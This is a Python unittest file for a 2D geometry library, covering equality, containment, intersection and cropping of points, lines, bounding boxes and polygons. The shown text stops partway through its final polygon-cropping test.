# boxes (B), polygons (Pg), multi-lines (ML), multi-polygons (MPg) and
# mixed collections (Co).
import unittest

import geom
from geom import P, L, B, Pg, Co, ML, MPg


class TestPoint(unittest.TestCase):
    """Equality semantics of P."""

    def test_point_eq(self):
        self.assertEqual(P((1, 1)), P((1.0, 1.0)))
        self.assertNotEqual(P((1, 1)), P((1.0001, 1.0)))


class TestLine(unittest.TestCase):
    """Construction, bound tests and intersection behaviour of L."""

    def assertPointEqual(self, a, b):
        """Assert two point-like pairs are equal to float tolerance."""
        self.assertAlmostEqual(a[0], b[0])
        self.assertAlmostEqual(a[1], b[1])

    def test_constructor(self):
        # Degenerate (zero-length) lines are rejected.
        with self.assertRaises(ValueError):
            L((3, 5), (3.0, 5.0))

    def test_in_bound(self):
        with self.assertRaises(ValueError):
            geom.in_bound((2, 1), (2, 1), (1, 1))
        # Horizontal
        line = L((1, 2), (5, 2))
        self.assertIsNone(line.in_bound(P(3, 2)))
        self.assertFalse(line.in_bound(P(3, 3)))
        self.assertTrue(line.in_bound(P(3, 1)))
        # Vertical
        line = L((-1, 2), (-1, 5))
        self.assertIsNone(line.in_bound(P(-1, 4)))
        self.assertTrue(line.in_bound(P(3, 3)))
        self.assertFalse(line.in_bound(P(-5, 7)))
        # Non-orthogonal
        line = L((1, 2), (4, 1))
        self.assertFalse(line.in_bound(P(3, 2)))
        self.assertTrue(line.in_bound(P(-1, 2)))
        self.assertIsNone(line.in_bound(P(3, 4/3)))
        line = L((-1, 2), (-4, 1))
        self.assertTrue(line.in_bound(P(-3, 2)))
        self.assertFalse(line.in_bound(P(0, 2)))

    def test_intersects_h(self):
        self.assertTrue(L((0, 0), (2, 2)).intersects_y(1))
        self.assertTrue(L((2, 2), (0, 0)).intersects_y(1))
        self.assertFalse(L((-1, -1), (5, -1)).intersects_y(-1))
        self.assertFalse(L((2, 2), (0, 2)).intersects_y(1))
        self.assertFalse(L((0, 0), (-1, -1)).intersects_y(1))

    def test_get_intercept_h(self):
        self.assertEqual(L((1, 1), (3, 3)).get_y_intercept(2), 2)
        self.assertEqual(L((3, 4), (5, 1)).get_y_intercept(2), 13/3)

    def test_extrapolate_intersection(self):
        # Vertical/horizontal
        a = L((3, 3), (3, 4))
        b = L((9, 9), (7, 9))
        expect = (3, 9)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        # Both vertical
        b = L((7, 7), (7, 5))
        self.assertIsNone(a.extrapolate_intersection(b))
        self.assertIsNone(b.extrapolate_intersection(a))
        # Vertical/non-orthogonal
        b = L((1, 2), (5, 3))
        expect = (3, 2.5)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        b = -b
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        b = L((4, 5), (5, 2))
        expect = (3, 8)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        b = -b
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        # Both horizontal
        a = L((1, 2), (4, 2))
        b = L((5, 6), (6, 6))
        self.assertIsNone(a.extrapolate_intersection(b))
        self.assertIsNone(b.extrapolate_intersection(a))
        # Horizontal/vertical
        b = L((9, 3), (9, -1))
        expect = (9, 2)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        # Horizontal/non-orthogonal
        b = L((9, 3), (10, 5))
        expect = (8.5, 2)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        # Both non-orthogonal
        a = L((0, 1), (4, 2))
        b = L((2, 4), (4, 3))
        expect = (5 + 1/3, 2 + 1/3)
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        b = -b
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        a = -a
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)
        b = -b
        self.assertPointEqual(a.extrapolate_intersection(b), expect)
        self.assertPointEqual(b.extrapolate_intersection(a), expect)

    def test_intersects_point(self):
        # Vertical
        line = L((3, 3), (3, 4))
        self.assertTrue(line.intersects_point(P(3, 3.5)))
        self.assertFalse(line.intersects_point(P(4, 3)))
        # Horizontal
        line = L((-2, -2), (2, -2))
        self.assertTrue(line.intersects_point(P(0, -2)))
        self.assertFalse(line.intersects_point(P(0, -1.999)))
        # Other
        line = L((0, 0), (2, 2))
        self.assertTrue(line.intersects_point(P(1, 1)))
        self.assertFalse(line.intersects_point(P(3, 3)))

    def test_intersects_line(self):
        # Vertical
        a = L((3, 3), (3, 5))
        self.assertFalse(a.intersects_line(L((4, 3), (4, 5))))
        self.assertFalse(a.intersects_line(L((0, 2), (4, 2))))
        self.assertTrue(a.intersects_line(L((3, 3), (4, 4))))
        self.assertTrue(a.intersects_line(L((0, 1), (5, 6))))
        self.assertTrue(a.intersects_line(L((3, 4), (3, 6))))
        # Horizontal
        a = L((3, 3), (-1, 3))
        self.assertFalse(a.intersects_line(L((-1, 2), (5, 2))))
        self.assertFalse(a.intersects_line(L((0, 2), (0, 0))))
        self.assertTrue(a.intersects_line(L((3, 3), (4, 4))))
        self.assertTrue(a.intersects_line(L((0, 0), (1, 5))))
        self.assertTrue(a.intersects_line(L((0, 3), (1, 3))))
        # Other
        a = L((0, 3), (4, 0))
        self.assertFalse(a.intersects_line(L((0, 0), (4, -3))))
        self.assertFalse(a.intersects_line(L((-1, 0), (0, 5))))
        self.assertTrue(a.intersects_line(L((0, 0), (5, 5))))
        self.assertTrue(a.intersects_line(L((4, 0), (-2, 1))))
        self.assertTrue(a.intersects_line(L((2, 1.5), (-2, 4.5))))

    def test_intersection_line(self):
        # Intersections may be None, a point, or an overlapping segment.
        # Vertical
        a = L((3, 3), (3, 5))
        self.assertIsNone(a.intersection_line(L((4, 3), (4, 5))))
        self.assertIsNone(a.intersection_line(L((0, 2), (4, 2))))
        self.assertEqual(
            a.intersection_line(L((3, 3), (4, 4))), P(3, 3))
        self.assertEqual(
            a.intersection_line(L((0, 1), (5, 6))), P(3, 4))
        self.assertEqual(
            a.intersection_line(L((3, 4), (3, 6))), L((3, 4), (3, 5)))
        # Horizontal
        a = L((3, 3), (-1, 3))
        self.assertIsNone(a.intersection_line(L((-1, 2), (5, 2))))
        self.assertIsNone(a.intersection_line(L((0, 2), (0, 0))))
        self.assertEqual(
            a.intersection_line(L((3, 3), (4, 4))), P(3, 3))
        self.assertEqual(
            a.intersection_line(L((0, 0), (1, 5))), P(3/5, 3))
        self.assertEqual(
            a.intersection_line(L((0, 3), (1, 3))), L((1, 3), (0, 3)))
        # Other
        a = L((0, 3), (4, 0))
        self.assertIsNone(a.intersection_line(L((0, 0), (4, -3))))
        self.assertIsNone(a.intersection_line(L((-1, 0), (0, 5))))
        self.assertEqual(
            a.intersection_line(L((4, 0), (0, 3))), L((0, 3), (4, 0)))
        self.assertTrue(a.intersection_line(L((0, 0), (5, 5))).nearly_equal(
            P(12/7, 12/7)))
        self.assertEqual(
            a.intersection_line(L((4, 0), (-2, 1))), P(4, 0))
        self.assertEqual(
            a.intersection_line(L((2, 1.5), (-2, 4.5))), L((0, 3), (2, 1.5)))

    def test_crop_line(self):
        # crop_line keeps the part of `a` on one side of `b`; negating
        # `b` flips which side is kept.
        a = L((0, 0), (4, 4))
        f = a.crop_line
        b = L((0, -1), (1, -1))
        self.assertIsNone(f(b))
        b = -b
        self.assertEqual(f(b), a)
        b = L((1, -1), (-1, 1))
        self.assertEqual(f(b), a)
        b = -b
        self.assertEqual(f(b), P(0, 0))
        b = L((0, 2), (1, 2))
        self.assertEqual(f(b), L((0, 0), (2, 2)))
        b = -b
        self.assertEqual(f(b), L((2, 2), (4, 4)))


class TestBoundingBox(unittest.TestCase):
    """Containment and intersection behaviour of B."""

    def test_contains(self):
        bbox = B(-2, -7/3, 3.1, 6)
        f = bbox.contains
        self.assertTrue(f(P(0, 0)))
        self.assertFalse(f(P(0, 6)))
        self.assertFalse(f(P(12, -8)))
        self.assertTrue(f(L((0, 0), (1, 1))))
        self.assertFalse(f(L((0, 0), (7, 7))))
        self.assertFalse(f(L((-3, 0), (-4, 1))))
        # Lines on the boundary are not contained
        self.assertFalse(f(L((3.1000000001, 0), (3.1000000001, -1))))
        self.assertTrue(f(B(0, 0, 1, 1)))
        self.assertFalse(f(B(0, 0, 1000, 1000)))
        self.assertFalse(f(B(-7, -7, -6, -6)))
        # A shape contains itself
        self.assertTrue(f(bbox))
        poly = Pg([(-1, -1), (0, 3), (3, 0), (-1, -1)])
        self.assertTrue(f(poly))
        poly = Pg([(6, 6), (7, 10), (10, 7), (6, 6)])
        self.assertFalse(f(poly))

    def test_intersects(self):
        bbox = B(0, 0, 10, 5)
        f = bbox.intersects
        # Points
        self.assertFalse(f(P(11, 0)))
        self.assertFalse(f(P(-1, 0)))
        self.assertFalse(f(P(1, -1)))
        self.assertFalse(f(P(1, 6)))
        self.assertTrue(f(P(3, 3)))
        self.assertTrue(f(P(0, 0)))
        self.assertTrue(f(P(0, 1)))
        self.assertTrue(f(P(0, 5)))
        self.assertTrue(f(P(5, 5)))
        self.assertTrue(f(P(10, 5)))
        self.assertTrue(f(P(10, 2)))
        self.assertTrue(f(P(10, 0)))
        self.assertTrue(f(P(9, 0)))
        # Lines:
        # - External
        self.assertFalse(f(L((11, 0), (11, 5))))
        # - Internal
        self.assertTrue(f(L((1, 1), (4, 3))))
        # - Overlapping
        self.assertTrue(f(L((-7, 4), (12, 4))))
        # - Boundary
        self.assertTrue(f(L((0, 0), (0, 5))))
        self.assertTrue(f(L((10, 4), (10, 6))))
        # - Corner
        self.assertTrue(f(L((9, -1), (11, 1))))
        # Polygons:
        poly = Pg([(0, 6), (0, 9), (4, 6), (0, 6)])
        # - External
        self.assertFalse(f(poly))
        # - Internal
        poly = poly.move(1, -5)
        self.assertTrue(f(poly))
        # - Overlapping
        poly = poly.move(8, 0)
        self.assertTrue(f(poly))
        # - Shared boundary line
        poly = poly.move(1, 0)
        self.assertTrue(f(poly))
        # - Shared boundary point
        poly = poly.move(-14, 0)
        self.assertTrue(f(poly))
        poly = poly.move(0, 4)
        self.assertTrue(f(poly))

    def test_intersection_point(self):
        bbox = B(0, 0, 10, 5)
        f = bbox.intersection
        self.assertIsNone(f(P(-1, 0)))
        p = P(0, 0)
        self.assertEqual(f(p), p)
        p = P(3, 3)
        self.assertEqual(f(p), p)
        p = P(10, 5)
        self.assertEqual(f(p), p)

    def test_intersection_line(self):
        bbox = B(0, 0, 10, 5)
        f = bbox.intersection
        # Fully external
        self.assertIsNone(f(L((11, 1), (12, 6))))
        # Fully internal
        line = L((1, 1), (9, 4))
        self.assertEqual(f(line), line)
        # Partly internal
        self.assertEqual(f(L((-1, 3), (1, 3))), L((0, 3), (1, 3)))
        self.assertEqual(f(L((5, 0), (11, 12))), L((5, 0), (7.5, 5)))
        # Shared boundary
        self.assertEqual(f(L((10, 5), (10, 0))), L((10, 5), (10, 0)))
        self.assertEqual(f(L((1, 5), (9, 5))), L((1, 5), (9, 5)))
        self.assertEqual(f(L((0, 2), (0, -2))), L((0, 2), (0, 0)))
        # Point contact
        self.assertEqual(f(L((15, 0), (5, 10))), P(10, 5))
        self.assertEqual(f(L((3, 5), (4, 8))), P(3, 5))

    def test_intersection_bbox(self):
        a = B(0, 0, 10, 5)
        f = a.intersection
        b = B(-5, -1, -1, 4)
        self.assertIsNone(f(b))
        b = B(2, 3, 8, 4)
        self.assertEqual(f(b), b)
        b = B(-10, -2, 15, 10)
        self.assertEqual(f(b), a)
        b = a
        self.assertEqual(f(b), a)
        b = B(8, -2, 12, 2)
        self.assertEqual(f(b), B(8, 0, 10, 2))

    def test_intersection_polygon(self):
        bbox = B(0, 0, 10, 5)
        f = bbox.intersection
        # No intersection
        poly = Pg([(12, 1), (13, 4), (17, 2), (12, 1)])
        self.assertIsNone(f(poly))
        # Fully internal
        poly = Pg([(1, 1), (3, 4), (7, 2), (1, 1)])
        self.assertEqual(f(poly), poly)
        # Fully containing
        poly = Pg([(-1, -1), (-2, 9), (13, 11), (14, -6), (-1, -1)])
        self.assertEqual(f(poly), bbox)
        # Partly internal
        poly = Pg([(8, 0), (12, 4), (12, 0), (8, 0)])
        self.assertEqual(f(poly), Pg([(8, 0), (10, 2), (10, 0), (8, 0)]))
        # Internal, shared boundary
        poly = Pg([(0, 0), (4, 5), (4, 0), (0, 0)])
        self.assertEqual(f(poly), poly)
        # External, shared boundary
        poly = Pg([(0, 0), (-4, 0), (0, 5), (0, 0)])
        self.assertTrue(f(poly).coterminous(L((0, 0), (0, 5))))
        # Point contact
        poly = Pg([(3, 9), (7, 9), (5, 5), (3, 9)])
        self.assertEqual(f(poly), P(5, 5))


class TestPolygon(unittest.TestCase):
    """Construction, containment, intersection and cropping of Pg.

    NOTE(review): the final test method is truncated in this copy of the
    file (see note at the bottom).
    """

    def test_constructor(self):
        # not enough distinct points
        with self.assertRaises(ValueError):
            poly = Pg([(1, 2), (1, 2), (3, 5), (1, 2)])
        # backtracking
        with self.assertRaises(ValueError):
            poly = Pg([(1, 2), (3, 6), (2, 4)])
        # self-intersection
        with self.assertRaises(ValueError):
            poly = Pg([(1, 2), (3, 6), (5, 4), (-1, 4), (1, 2)])
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        self.assertEqual(len(poly), 4)

    def test_eq(self):
        a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        b = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        self.assertEqual(a, b)
        b = Pg([(1, 2), (3.1, 5), (4, 1), (1, 2)])
        self.assertNotEqual(a, b)
        b = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        self.assertNotEqual(a, b)
        # Same ring of points, but starting from a different one.
        b = Pg([(4, 1), (1, 2), (3, 5), (4, 1)])
        self.assertEqual(a, b)

    def test_is_convex(self):
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        self.assertTrue(poly.is_convex)
        # octagon centred on (0, 0)
        poly = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        self.assertTrue(poly.is_convex)
        # definitely non-convex
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        self.assertFalse(poly.is_convex)

    def test_divide_polygon(self):
        poly = [
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ]
        # Invalid index pairs are rejected.
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, 0, 0)
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, 0, 1)
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, 4, 3)
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, -1, 3)
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, 4, 9)
        with self.assertRaises(ValueError):
            geom.divide_polygon(poly, 7, 0)
        self.assertEqual(
            geom.divide_polygon(poly, 0, 3),
            (
                [(1, 1), (1, 6), (2, 5), (2, 2), (1, 1)],
                [(1, 1), (2, 2), (4, 2), (3, 4), (5, 4), (4, 0), (1, 1)],
            ))
        self.assertEqual(
            geom.divide_polygon(poly, 4, 8),
            (
                [(4, 2), (3, 4), (5, 4), (4, 0), (1, 1), (4, 2)],
                [(1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (1, 1)],
            ))
        self.assertEqual(
            geom.divide_polygon(poly, 4, 7),
            (
                [(4, 2), (3, 4), (5, 4), (4, 0), (4, 2)],
                [(1, 1), (1, 6), (2, 5), (2, 2), (4, 2), (4, 0), (1, 1)],
            ))

    def test_shift_polygon(self):
        # simple triangle
        poly = [(1, 2), (3, 5), (4, 1), (1, 2)]
        self.assertEqual(geom.shift_polygon(poly, 0), poly)
        shift1 = [(3, 5), (4, 1), (1, 2), (3, 5)]
        shift2 = [(4, 1), (1, 2), (3, 5), (4, 1)]
        self.assertEqual(geom.shift_polygon(poly, 1), shift1)
        self.assertEqual(geom.shift_polygon(poly, 2), shift2)
        self.assertEqual(geom.shift_polygon(poly, 3), poly)
        self.assertEqual(geom.shift_polygon(poly, 4), shift1)

    def test_contains_point(self):
        # simple triangle; expect[y][x] is containment of integer grid points
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = poly.contains_point
        expect = (
            (False, False, False, False, False),
            (False, False, False, False, False),
            (False, False, True, True, False),
            (False, False, True, True, False),
            (False, False, False, True, False),
            (False, False, False, False, False),
        )
        for y in range(len(expect)):
            for x in range(len(expect[y])):
                self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})")
        # octagon centred on (0, 0)
        poly = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        f = poly.contains_point
        self.assertTrue(f(P(1, 1)))
        self.assertTrue(f(P(1, -1)))
        self.assertTrue(f(P(-1, -1)))
        self.assertTrue(f(P(-1, 1)))
        self.assertFalse(f(P(2, 2)))
        # horseshoe
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.contains_point
        expect = (
            (False, False, False, False, False, False, False),
            (False, False, True, True, True, False, False),
            (False, False, False, False, False, False, False),
            (False, False, False, False, True, False, False),
            (False, False, False, False, False, False, False),
            (False, False, False, False, False, False, False),
            (False, False, False, False, False, False, False),
        )
        for y in range(len(expect)):
            for x in range(len(expect[y])):
                self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})")

    def test_contains_line(self):
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = poly.contains_line
        # Fully external
        self.assertFalse(f(L((10, 0), (10, 2))))
        self.assertFalse(f(L((2, 0), (0, 3))))
        # Partly external
        self.assertFalse(f(L((3, 3), (5, 3))))
        # Fully internal
        self.assertTrue(f(L((3, 2), (2, 3))))
        # Spanning
        self.assertTrue(f(L((1, 2), (3.5, 3))))
        # On boundary
        self.assertFalse(f(L((3.5, 3), (3.75, 2))))
        self.assertFalse(f(L((3.5, 3), (4.5, -1))))
        # horseshoe
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.contains_line
        # Fully external
        self.assertFalse(f(L((10, 0), (10, 2))))
        self.assertFalse(f(L((3, 0), (0, 0))))
        # Partly external
        self.assertFalse(f(L((4, 3), (6, 3))))
        # Fully internal
        self.assertTrue(f(L((3, 1), (2, 1))))
        # Spanning
        self.assertTrue(f(L((1, 4), (2, 4))))
        # From boundary to internal
        self.assertTrue(f(L((1, 2), (3, 1))))
        # On boundary
        self.assertFalse(f(L((1, 2), (1, 5))))
        self.assertFalse(f(L((4, 4), (6, 4))))

    def test_contains_bbox(self):
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = poly.contains_bbox
        # Fully internal
        self.assertTrue(f(B(2, 2, 3, 3)))
        # Fully external
        self.assertFalse(f(B(20, 20, 30, 30)))
        # Partly external
        self.assertFalse(f(B(1, 1, 3, 3)))
        # Point contact with boundary
        self.assertTrue(f(B(2, 2, 3.5, 3)))
        # octagon centred on (0, 0)
        poly = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        f = poly.contains_bbox
        # Sharing entire boundary lines
        self.assertTrue(f(B(-2, -1, 2, 1)))
        self.assertFalse(f(B(-1, 2, 1, 4)))
        # horseshoe
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.contains_bbox
        self.assertTrue(f(B(2, 1, 4, 1.5)))

    def test_contains_poly(self):
        # Simple triangle
        a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = a.contains_polygon
        # Fully internal
        b = Pg([(2, 2), (3, 4), (3, 2), (2, 2)])
        self.assertTrue(f(b))
        # Fully external
        b = b.move(10, 0)
        self.assertFalse(f(b))
        # Partly external
        b = b.move(-10, -2)
        self.assertFalse(f(b))
        # Point contact with boundary
        self.assertTrue(f(Pg([(3.5, 3), (2, 2), (3, 4), (3.5, 3)])))
        # Octagon centred on (0, 0)
        a = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        f = a.contains_polygon
        # Sharing entire boundary lines
        b = Pg([
            (-2, -1), (-2, 1), (0, 2), (2, 1), (2, -1), (0, -2),
            (-2, -1),
        ])
        self.assertTrue(f(b))
        b = b.move(4, 0)
        self.assertFalse(f(b))
        # Horseshoe
        a = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = a.contains_polygon
        b = Pg([
            (1, 1), (1, 3), (4, 3), (4, 1),
            (1, 1),
        ])
        self.assertFalse(f(b))

    def test_intersects_point(self):
        # horseshoe; expect[y][x] is intersection with integer grid points
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.intersects
        expect = (
            (False, False, False, False, True, False, False),
            (False, True, True, True, True, False, False),
            (False, True, True, True, True, False, False),
            (False, True, True, False, True, False, False),
            (False, True, True, True, True, True, False),
            (False, True, True, False, False, False, False),
            (False, True, False, False, False, False, False),
        )
        for y in range(len(expect)):
            for x in range(len(expect[y])):
                self.assertIs(f(P(x, y)), expect[y][x], f"({x}, {y})")

    def test_intersects_line(self):
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = poly.intersects
        # Fully external
        self.assertFalse(f(L((10, 0), (10, 2))))
        self.assertFalse(f(L((2, 0), (0, 3))))
        # Partly external
        self.assertTrue(f(L((3, 3), (5, 3))))
        # Fully internal
        self.assertTrue(f(L((3, 2), (2, 3))))
        # Spanning
        self.assertTrue(f(L((1, 2), (3.5, 3))))
        # On boundary
        self.assertTrue(f(L((3.5, 3), (3.75, 2))))
        self.assertTrue(f(L((3.5, 3), (4.5, -1))))
        # horseshoe
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.intersects
        # Fully external
        self.assertFalse(f(L((10, 0), (10, 2))))
        self.assertFalse(f(L((3, 0), (0, 0))))
        # Partly external
        self.assertTrue(f(L((4, 3), (6, 3))))
        # Fully internal
        self.assertTrue(f(L((3, 1), (2, 1))))
        # Spanning
        self.assertTrue(f(L((1, 4), (2, 4))))
        # From boundary to internal
        self.assertTrue(f(L((1, 2), (3, 1))))
        # On boundary
        self.assertTrue(f(L((1, 2), (1, 5))))
        self.assertTrue(f(L((4, 4), (6, 4))))

    def test_intersects_bbox(self):
        # simple triangle
        poly = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = poly.intersects
        # Fully internal
        self.assertTrue(f(B(2, 2, 3, 3)))
        # Fully external
        self.assertFalse(f(B(20, 20, 30, 30)))
        # Partly external
        self.assertTrue(f(B(1, 1, 3, 3)))
        # Point contact with boundary
        self.assertTrue(f(B(2, 2, 3.5, 3)))
        # octagon centred on (0, 0)
        poly = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        f = poly.intersects
        # Sharing entire boundary lines
        self.assertTrue(f(B(-2, -1, 2, 1)))
        self.assertTrue(f(B(-1, 2, 1, 4)))
        # horseshoe
        poly = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = poly.intersects
        self.assertTrue(f(B(2, 1, 4, 1.5)))

    def test_intersects_poly(self):
        # Simple triangle
        a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = a.intersects
        # Fully internal
        b = Pg([(2, 2), (3, 4), (3, 2), (2, 2)])
        self.assertTrue(f(b))
        # Fully external
        b = b.move(10, 0)
        self.assertFalse(f(b))
        # Partly external
        b = b.move(-10, -2)
        self.assertTrue(f(b))
        # Point contact with boundary
        self.assertTrue(f(Pg([(3.5, 3), (2, 2), (3, 4), (3.5, 3)])))
        # Octagon centred on (0, 0)
        a = Pg([
            (1, 2), (2, 1), (2, -1), (1, -2),
            (-1, -2), (-2, -1), (-2, 1), (-1, 2),
            (1, 2),
        ])
        f = a.intersects
        # Sharing entire boundary lines
        b = Pg([
            (-2, -1), (-2, 1), (0, 2), (2, 1), (2, -1), (0, -2),
            (-2, -1),
        ])
        self.assertTrue(f(b))
        b = b.move(4, 0)
        self.assertTrue(f(b))
        # Horseshoe
        a = Pg([
            (1, 1), (1, 6), (2, 5), (2, 2), (4, 2),
            (3, 4), (5, 4), (4, 0), (1, 1),
        ])
        f = a.intersects
        b = Pg([
            (1, 1), (1, 3), (4, 3), (4, 1),
            (1, 1),
        ])
        self.assertTrue(f(b))

    def test_intersection_line(self):
        # Simple triangle
        a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = a.intersection
        self.assertIsNone(f(L((0, 0), (1, 0))))
        b = L((2, 2), (3, 2))
        self.assertEqual(f(b), b)
        b = L((1, 2), (3, 5))
        self.assertEqual(f(b), b)
        # Square
        a = Pg([(0, 0), (0, 2), (2, 2), (2, 0), (0, 0)])
        f = a.intersection
        # - Edge to edge
        b = L((0, 1), (2, 1))
        self.assertEqual(f(b), b)
        # - Vertex to vertex
        b = L((0, 0), (2, 2))
        self.assertEqual(f(b), b)
        # - Vertex to edge
        b = L((0, 0), (1, 2))
        self.assertEqual(f(b), b)
        # - Edge to internal
        b = L((0, 1), (1, 1))
        self.assertEqual(f(b), b)
        # - From internal to external
        b = L((1, 1), (1, 3))
        self.assertEqual(f(b), L((1, 1), (1, 2)))
        # - Edge to external
        b = L((2, 1), (4, 4))
        self.assertEqual(f(b), P(2, 1))
        # - External to vertex
        b = L((-2, -2), (0, 0))
        self.assertEqual(f(b), P(0, 0))
        # Non-convex
        a = Pg([
            (1, 0), (1, 4), (2, 4), (2, 1), (4, 1),
            (4, 4), (5, 4), (5, 0), (1, 0)])
        b = L((0, 2), (6, 2))
        f = a.intersection
        self.assertIsNone(f(L((0, -1), (2, -2))))
        self.assertEqual(f(b), ML((L((1, 2), (2, 2)), L((4, 2), (5, 2)))))
        # Vertex contact
        self.assertEqual(f(L((0, 3), (2, 5))), P(1, 4))
        # Single-line intersections
        self.assertEqual(f(L((1, -1), (1, 7))), L((1, 0), (1, 4)))
        self.assertEqual(f(L((1, 2), (1, 3))), L((1, 2), (1, 3)))
        self.assertEqual(f(L((1, 2), (1, 3))), L((1, 2), (1, 3)))
        self.assertEqual(f(L((2, 1), (4, 1))), L((2, 1), (4, 1)))
        self.assertEqual(f(L((2, 4), (1, 3))), L((2, 4), (1, 3)))
        # Multiple line intersections, passing through vertices
        b = L((0, -1), (6, 5))
        exp = ML((L((1, 0), (2, 1)), L((4, 3), (5, 4))))
        self.assertEqual(f(b), exp)
        # Mixed lines and points
        b = L((0, 5), (6, 2))
        exp = Co((P(2, 4), L((4, 3), (5, 2.5))))
        self.assertEqual(f(b), exp)

    def test_crop_line(self):
        # Simple triangle
        a = Pg([(1, 2), (3, 5), (4, 1), (1, 2)])
        f = a.crop_line
        self.assertIsNone(f(L((0, 0), (1, 0))))
        self.assertEqual(f(L((0, 0), (0, 5))), a)
        self.assertEqual(f(L((1, 2), (3, 5))), a)
        b = L((0, 3), (2, 1))
        self.assertEqual(f(b), P(1, 2))
        b = L((3, 5), (1, 2))
        self.assertTrue(b.coterminous(f(b)))
        # Right triangle
        a = Pg([(0, 0), (0, 3), (3, 0), (0, 0)])
        f = a.crop_line
        # - Horizontal crop
        exp = Pg([(0, 1), (0, 3), (2, 1), (0, 1)])
        self.assertEqual(f(L((1, 1), (0, 1))), exp)
        exp = Pg([(0, 0), (0, 1), (2, 1), (3, 0), (0, 0)])
        self.assertEqual(f(L((0, 1), (1, 1))), exp)
        # Square
        a = Pg([(0, 0), (0, 2), (2, 2), (2, 0), (0, 0)])
        f = a.crop_line
        # - Crop between two vertices
        exp = Pg([(0, 0), (2, 2), (2, 0), (0, 0)])
        self.assertEqual(f(L((0, 0), (2, 2))), exp)
        # - Crop from one vertex to an edge
        exp = Pg([(0, 0), (0, 2), (1, 0), (0, 0)])
        self.assertEqual(f(L((0, 2), (1, 0))), exp)

    def test_crop_line_non_convex(self):
        a = Pg([
            (1, 0), (1, 4), (2, 4), (2, 1), (4, 1),
            (4, 4), (5, 4), (5, 0), (1, 0)])
        f = a.crop_line
        # Single point
        b = L((6, 3), (4, 5))
        self.assertEqual(f(b), P(5, 4))
        # Single polygon
        b = L((0, 2), (6, 2))
        exp = Pg([
            (1, 0), (1, 2), (2, 2), (2, 1), (4, 1),
            (4, 2), (5, 2), (5, 0), (1, 0)])
        self.assertEqual(f(b), exp)
        # Multiple polygons
        b = -b
        exp = MPg([
